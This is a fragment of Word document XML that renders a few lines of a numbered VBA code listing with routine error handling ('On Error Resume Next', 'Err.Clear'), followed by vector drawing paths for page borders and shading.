          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="9100" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>203</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sub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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>205</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="81"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SetVersion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>206</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Resume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>207</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>208</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>209</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>   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Debug</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>210</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Clear</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>211</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>End</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If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shape style="position:absolute;margin-left:466.200pt;margin-top:209.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:111.594pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,2231">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:2231" coordorigin="10472,0" coordsize="0,2231" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,1,10472,2,10472,2,10472,3,10472,4,10472,5,10472,6,10472,7,10472,9,10472,10,10472,12,10472,14,10472,16,10472,18,10472,20,10472,23,10472,26,10472,29,10472,32,10472,35,10472,39,10472,43,10472,47,10472,52,10472,56,10472,61,10472,67,10472,72,10472,78,10472,84,10472,91,10472,98,10472,105,10472,112,10472,120,10472,128,10472,137,10472,146,10472,155,10472,165,10472,175,10472,186,10472,197,10472,208,10472,220,10472,232,10472,245,10472,258,10472,272,10472,286,10472,300,10472,315,10472,331,10472,347,10472,363,10472,380,10472,398,10472,416,10472,435,10472,454,10472,474,10472,494,10472,515,10472,536,10472,558,10472,581,10472,604,10472,628,10472,653,10472,678,10472,703,10472,730,10472,757,10472,785,10472,813,10472,842,10472,872,10472,902,10472,933,10472,965,10472,998,10472,1031,10472,1065,10472,1100,10472,1135,10472,1171,10472,1208,10472,1246,10472,1285,10472,1324,10472,1364,10472,1405,10472,1447,10472,1489,10472,1533,10472,1577,10472,1622,10472,1668,10472,1715,10472,1762,10472,1811,10472,1860,10472,1911,10472,1962,10472,2014,10472,2067,10472,2121,10472,2176,10472,2231e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:48.500pt;width:455.500pt;height:15.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,970" coordsize="9110,310">
        <v:shape style="position:absolute;left:1430;top:970;width:9110;height:310" coordorigin="1430,970" coordsize="9110,310" path="m1440,999l1440,999,1440,999,1440,999,1441,999,1441,999,1441,999,1442,999,1442,999,1443,999,1444,999,1446,999,1448,999,1450,999,1452,999,1455,999,1459,999,1463,999,1467,999,1472,999,1477,999,1484,999,1490,999,1498,999,1506,999,1515,999,1525,999,1535,999,1547,999,1559,999,1572,999,1586,999,1601,999,1617,999,1635,999,1653,999,1672,999,1692,999,1714,999,1737,999,1761,999,1786,999,1813,999,1841,999,1870,999,1901,999,1933,999,1966,999,2001,999,2038,999,2076,999,2116,999,2157,999,2200,999,2245,999,2291,999,2339,999,2389,999,2441,999,2494,999,2550,999,2607,999,2667,999,2728,999,2791,999,2856,999,2924,999,2993,999,3065,999,3139,999,3215,999,3293,999,3374,999,3457,999,3542,999,3629,999,3719,999,3812,999,3907,999,4004,999,4104,999,4206,999,4311,999,4419,999,4529,999,4642,999,4758,999,4876,999,4998,999,5122,999,5249,999,5378,999,5511,999,5647,999,5785,999,5927,999,6072,999,6220,999,6371,999,6525,999,6682,999,6842,999,7006,999,7173,999,7343,999,7517,999,7694,999,7874,999,8058,999,8245,999,8436,999,8630,999,8828,999,9030,999,9235,999,9444,999,9656,999,9872,999,10092,999,10316,999,10543,999,10543,999,10543,999,10543,999,10543,999,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1002,10543,1003,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1012,10543,1013,10543,1014,10543,1015,10543,1016,10543,1017,10543,1018,10543,1019,10543,1020,10543,1022,10543,1023,10543,1024,10543,1026,10543,1027,10543,1029,10543,1031,10543,1032,10543,1034,10543,1036,10543,1038,10543,1040,10543,1042,10543,1044,10543,1046,10543,1048,10543,1050,10543,1053,10543,1055,10543,1058,10543,1060,10543,1063,10543,1066,10543,1068,10543,1071,10543,1074,10543,1077,10543,1080,10543,1083,10543,1087,10543,1090,10543,1094,10543,1097,10543,1101,10543,1104,10543,1108,10543,1112,10543,1116,10543,1120,10543,1124,10543,1129,10543,1133,10543,1137,10543,1142,10543,1146,10543,1151,10543,1156,10543,1161,10543,1166,10543,1171,10543,1176,10543,1182,10543,1187,10543,1193,10543,1199,10543,1204,10543,1210,10543,1216,10543,1222,10543,1229,10543,1235,10543,1242,10543,1248,10543,1255,10543,1262,10543,1269,10543,1276,10543,1283,10543,1290,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10543,1298,10542,1298,10542,1298,10541,1298,10540,1298,10538,1298,10536,1298,10534,1298,10532,1298,10529,1298,10525,1298,10521,1298,10517,1298,10512,1298,10506,1298,10500,1298,10493,1298,10486,1298,10478,1298,10469,1298,10459,1298,10449,1298,10437,1298,10425,1298,10412,1298,10398,1298,10383,1298,10366,1298,10349,1298,10331,1298,10312,1298,10291,1298,10270,1298,10247,1298,10223,1298,10198,1298,10171,1298,10143,1298,10114,1298,10083,1298,10051,1298,10018,1298,9983,1298,9946,1298,9908,1298,9868,1298,9827,1298,9784,1298,9739,1298,9693,1298,9645,1298,9595,1298,9543,1298,9489,1298,9434,1298,9377,1298,9317,1298,9256,1298,9193,1298,9127,1298,9060,1298,8990,1298,8919,1298,8845,1298,8769,1298,8691,1298,8610,1298,8527,1298,8442,1298,8354,1298,8265,1298,8172,1298,8077,1298,7980,1298,7880,1298,7778,1298,7673,1298,7565,1298,7455,1298,7342,1298,7226,1298,7108,1298,6986,1298,6862,1298,6735,1298,6605,1298,6473,1298,6337,1298,6198,1298,6057,1298,5912,1298,5764,1298,5613,1298,5459,1298,5302,1298,5142,1298,4978,1298,4811,1298,4641,1298,4467,1298,4290,1298,4110,1298,3926,1298,3739,1298,3548,1298,3354,1298,3156,1298,2954,1298,2749,1298,2540,1298,2328,1298,2112,1298,1892,1298,1668,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1298,1440,1297,1440,1297,1440,1297,1440,1297,1440,1297,1440,1297,1440,1297,1440,1297,1440,1296,1440,1296,1440,1296,1440,1296,1440,1295,1440,1295,1440,1295,1440,1294,1440,1294,1440,1293,1440,1293,1440,1292,1440,1292,1440,1291,1440,1291,1440,1290,1440,1289,1440,1289,1440,1288,1440,1287,1440,1286,1440,1286,1440,1285,1440,1284,1440,1283,1440,1282,1440,1281,1440,1279,1440,1278,1440,1277,1440,1276,1440,1274,1440,1273,1440,1271,1440,1270,1440,1268,1440,1267,1440,1265,1440,1263,1440,1261,1440,1260,1440,1258,1440,1256,1440,1253,1440,1251,1440,1249,1440,1247,1440,1245,1440,1242,1440,1240,1440,1237,1440,1234,1440,1232,1440,1229,1440,1226,1440,1223,1440,1220,1440,1217,1440,1214,1440,1210,1440,1207,1440,1204,1440,1200,1440,1197,1440,1193,1440,1189,1440,1185,1440,1181,1440,1177,1440,1173,1440,1169,1440,1164,1440,1160,1440,1155,1440,1151,1440,1146,1440,1141,1440,1136,1440,1131,1440,1126,1440,1121,1440,1115,1440,1110,1440,1104,1440,1099,1440,1093,1440,1087,1440,1081,1440,1075,1440,1069,1440,1062,1440,1056,1440,1049,1440,1042,1440,1036,1440,1029,1440,1021,1440,1014,1440,1007,1440,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:1.500pt;height:15.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="30,310">
        <v:shape style="position:absolute;left:1430;top:990;width:30;height:310" coordorigin="1430,990" coordsize="30,310" path="m1447,999l1447,999,1447,999,1447,999,1447,999,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1001,1447,1001,1447,1001,1447,1001,1447,1001,1447,1002,1447,1002,1447,1002,1447,1003,1447,1003,1447,1003,1447,1004,1447,1004,1447,1005,1447,1005,1447,1006,1447,1006,1447,1007,1447,1008,1447,1008,1447,1009,1447,1010,1447,1011,1447,1012,1447,1013,1447,1014,1447,1015,1447,1016,1447,1017,1447,1018,1447,1019,1447,1020,1447,1022,1447,1023,1447,1024,1447,1026,1447,1027,1447,1029,1447,1031,1447,1032,1447,1034,1447,1036,1447,1038,1447,1040,1447,1042,1447,1044,1447,1046,1447,1048,1447,1050,1447,1053,1447,1055,1447,1058,1447,1060,1447,1063,1447,1066,1447,1068,1447,1071,1447,1074,1447,1077,1447,1080,1447,1083,1447,1087,1447,1090,1447,1094,1447,1097,1447,1101,1447,1104,1447,1108,1447,1112,1447,1116,1447,1120,1447,1124,1447,1129,1447,1133,1447,1137,1447,1142,1447,1146,1447,1151,1447,1156,1447,1161,1447,1166,1447,1171,1447,1176,1447,1182,1447,1187,1447,1193,1447,1199,1447,1204,1447,1210,1447,1216,1447,1222,1447,1229,1447,1235,1447,1242,1447,1248,1447,1255,1447,1262,1447,1269,1447,1276,1447,1283,1447,1290,1447,1298e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:63.500pt;width:455.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1270" coordsize="9110,330">
        <v:shape style="position:absolute;left:1430;top:1270;width:9110;height:330" coordorigin="1430,1270" coordsize="9110,330" path="m1440,1298l1440,1298,1440,1298,1440,1298,1441,1298,1441,1298,1441,1298,1442,1298,1442,1298,1443,1298,1444,1298,1446,1298,1448,1298,1450,1298,1452,1298,1455,1298,1459,1298,1463,1298,1467,1298,1472,1298,1477,1298,1484,1298,1490,1298,1498,1298,1506,1298,1515,1298,1525,1298,1535,1298,1547,1298,1559,1298,1572,1298,1586,1298,1601,1298,1617,1298,1635,1298,1653,1298,1672,1298,1692,1298,1714,1298,1737,1298,1761,1298,1786,1298,1813,1298,1841,1298,1870,1298,1901,1298,1933,1298,1966,1298,2001,1298,2038,1298,2076,1298,2116,1298,2157,1298,2200,1298,2245,1298,2291,1298,2339,1298,2389,1298,2441,1298,2494,1298,2550,1298,2607,1298,2667,1298,2728,1298,2791,1298,2856,1298,2924,1298,2993,1298,3065,1298,3139,1298,3215,1298,3293,1298,3374,1298,3457,1298,3542,1298,3629,1298,3719,1298,3812,1298,3907,1298,4004,1298,4104,1298,4206,1298,4311,1298,4419,1298,4529,1298,4642,1298,4758,1298,4876,1298,4998,1298,5122,1298,5249,1298,5378,1298,5511,1298,5647,1298,5785,1298,5927,1298,6072,1298,6220,1298,6371,1298,6525,1298,6682,1298,6842,1298,7006,1298,7173,1298,7343,1298,7517,1298,7694,1298,7874,1298,8058,1298,8245,1298,8436,1298,8630